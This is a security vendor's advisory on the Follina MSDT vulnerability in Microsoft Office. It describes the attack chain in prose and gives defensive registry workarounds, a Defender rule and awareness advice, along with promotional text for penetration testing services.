MSDT Follina vulnerability

Table of Contents

What is Microsoft Vulnerability MSDT-Follina?

On May 30, 2022, a critical vulnerability in Microsoft Office became known. This gap can be found under the synonym "Follina" and is referred to under CVE-2022-30190 listed. It is particularly critical that the attack complexity is classified as low. The vulnerability can therefore also be exploited by inexperienced attackers and lead to potentially high damage on the affected system.

General information about MSDT-Follina

The vulnerability uses the Microsoft Support Diagnostic Tool (MSDT) [https://docs.microsoft.com/de-de/windows-server/administration/windows-commands/msdt], with which diagnostic data is normally collected and sent to Microsoft . However, affected files reload malicious code or components via the Internet and execute them with the existing user rights on the system. This allows the attacker to gain full control over the system and the data available on it and manipulate them. Depending on whether there are other vulnerabilities, further attacks such as privilege escalation can occur.

You want to see the consequences of a hacker attack
Spare your IT system?
Test your IT now with a professional penetration test!
For the penetration test

Technical information on MSDT-Follina

The affected document contains an https URL that is downloaded. This executes Java Script code which in turn references a URL with a reference to an ms-msdt link. The tool described above is called with the parameters passed and loads malicious code. This is then called up and executed using Power Shell. What is particularly insidious is that these are not macros and the classic macro protection does not offer any help against this attack!

Workaround

The following workaround is recommended until a patch is available.

The MSDT URL protocol used in the attack should be deactivated so that it is no longer possible for the links used to be called up and executed automatically.

1. Open command line as administrator

2. Create a backup of the registry key: HKEY_CLASSES_ROOT\ms-msdt using the command:
				
					reg export HKEY_CLASSES_ROOT\ms-msdt filename
				
			
3. Delete the registry key using:
				
					reg delete HKEY_CLASSES_ROOT\ms-msdt /f
				
			
If the process is undone, the saved key can be imported again with the following command:
				
					reg import filename
				
			

No negative effects on productivity are known to date, but appropriate trial and error testing should be done at this point as well.

Details are below Link a DAK Bungalow.

Alternative solutions

Furthermore, Microsoft recommends that users of "Microsoft Defender for Endpoint Security" activate the "BlockOfficeCreateProcessRule" rule, which prevents Office applications from creating sub-processes.

In addition, Microsoft Defender from build 1.367.719.0 or later detects such attacks via its signature files.

Further steps

In addition, all employees can be informed and sensitized to be particularly vigilant when receiving Office files. The sender should be verified and the content of the file should be expected and known. If ways of raising awareness and informing employees are already known, this information should be distributed accordingly.

As soon as further information is available from Microsoft, in particular on patches or updates, we will inform you accordingly or deposit it on this website. The vulnerability has only recently become known, so that further attack scenarios can develop and further measures are necessary. Those affected should therefore follow further developments. In the event of changes, we will inform you on our website and continuously update the information on this advisory.

Increase the security of your IT now!
You will receive detailed advice from us!
Contact us now